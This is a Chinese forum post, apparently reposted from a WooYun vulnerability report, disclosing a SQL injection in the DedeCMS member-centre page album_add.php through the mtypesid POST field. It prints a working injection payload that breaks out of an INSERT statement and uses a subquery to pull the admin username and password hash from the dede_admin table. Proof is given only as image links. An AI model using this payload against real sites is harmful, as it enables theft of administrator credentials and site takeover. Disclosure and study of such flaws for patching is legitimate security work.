2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

Dedecms会员中心album_add.php页面SQL注入漏洞

公共账号 管理员组

简要描述:[p=25, null, left]注册和关注wooyun好久了,dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的
漏洞需要会员,所以比较鸡肋啦
[/p]详细说明:[p=25, null, left]发表文章处,post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php



注入的代码:

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

[/p][p=25, null, left]http://www.wooyun.org/upload/201307/1209090193aa72e6d16883f4befe41603bde5cd2.png[/p]
漏洞证明:
[p=25, null, left]http://www.wooyun.org/upload/201307/12090916e947591ebafd233766ce20ff911bc7f7.png[/p]
站长窝论坛版权声明 1、本帖标题:Dedecms会员中心album_add.php页面SQL注入漏洞
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由公共账号在站长窝论坛《交流综合区》版块原创发布, 转载请注明出处!
评论
最新回复 (1)
返回
发新帖